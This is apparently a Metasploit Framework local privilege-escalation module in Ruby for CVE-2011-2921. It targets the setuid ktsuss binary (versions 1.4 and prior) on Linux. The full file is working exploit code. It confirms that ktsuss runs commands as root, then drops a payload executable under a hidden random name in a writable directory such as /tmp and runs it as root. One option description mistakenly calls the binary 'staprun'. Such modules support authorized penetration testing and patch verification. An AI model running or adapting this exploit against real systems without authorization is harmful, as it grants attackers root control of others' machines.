##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ktsuss suid Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges by exploiting
        a vulnerability in ktsuss versions 1.4 and prior.

        The ktsuss executable is setuid root and does not drop
        privileges prior to executing user specified commands,
        resulting in command execution with root privileges.

        This module has been tested successfully on:

        ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
        ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'John Lightsey', # Discovery and exploit
          'bcoles'         # Metasploit
        ],
      'DisclosureDate' => '2011-08-13',
      'References'     =>
        [
          ['CVE', '2011-2921'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'AppendExit'       => true,
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependSetreuid'  => true,
          'PrependSetuid'    => true,
          'PrependFork'      => true
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def ktsuss_path
    datastore['KTSUSS_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    unless setuid? ktsuss_path
      vprint_error "#{ktsuss_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{ktsuss_path} is setuid"

    id = cmd_exec 'whoami'
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
    vprint_status res

    unless res.include? 'uid=0'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload ...'
    id = cmd_exec 'whoami'
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
    vprint_line res
  end
end